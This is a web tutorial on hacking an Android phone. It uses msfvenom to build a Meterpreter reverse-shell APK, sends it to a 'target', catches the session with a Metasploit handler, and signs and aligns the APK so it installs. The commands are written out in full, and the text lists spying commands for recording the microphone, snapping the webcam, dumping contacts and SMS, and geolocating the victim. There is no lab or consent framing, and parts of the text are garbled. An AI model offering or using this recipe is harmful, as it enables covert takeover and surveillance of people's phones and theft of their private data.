Hack Android Mobile Phone using MSFVenom Linux Times

HOW ANDROID HACK
Requirements

Linux Operating System (In this tutorial we use Linux Times 2017.2)
Metasploit Framework

MSFVenom is a hacking tool that targets the Android operating system. This tool is a composite of MSFEncode & MSFPayload.

Ok now let's start opening a new terminal and enter the following command This command assigns our charge and create our custom executable.


# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 
LPORT=4444 R > hack.apk

If you do not know what your LHOST is, you can look it up using ifconfig.

 # ifconfig

You have now finished creating your malicious .apk file, it will be saved to your / home / folder. Find the new one you created .apk and send it to your target (hack.apk).

Now we need to start the Metasploit framework and set up a multi-handler. This is a special payload, as it is usually a Multistage Meterpreter charge, where the minimum amount of code is sent as part of an exploit, and then more uploads after the code execution is complete.

Open a new terminal and use the following command to start the Metasploit framework after the console starts creating your multi / handler.

# msfconsole 

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit 

When Target clicks on a malicious app from the Android Main Activity Menu, a session between Metasploit and Android phones will be created. For new session list you can use session command -i to connect to new session using session command -i 1 replace 1 with session id you want to contact.

 

You may want to try some of these useful Exploit commands:

– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate

 

Signing Methods
Keytool (Comes Pre-Installed in Kali Linux)

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name

 -keyalg RSA -keysize 2048 -validity 10000

Jarsinger (Comes Pre-Installed in Kali Linux) 

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1

 -keystore my-release-key.Keystore APPNAME.apk aliasname

jarsigner -verify -verbose -certs APPNAME.apk

Zipalign (Does not come pre-installed in Kali Linux)

Install Zipalign

apt-get install zipalign

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

Or if you choose to sign your .apk files directly from your Android device, you can sign your .apk file with ZipSigner an Android app that flags the update.zip, APK, or JAR files using your private key or one of four that there is. -in the certificate (media, platform, shared, testkey). All outputs are automatically zip-aligned. ZipSigner is a combination of applications from jarsigner, signapk, keytool, and zipalign.

Download ZipSigner 

android hacking apps 2017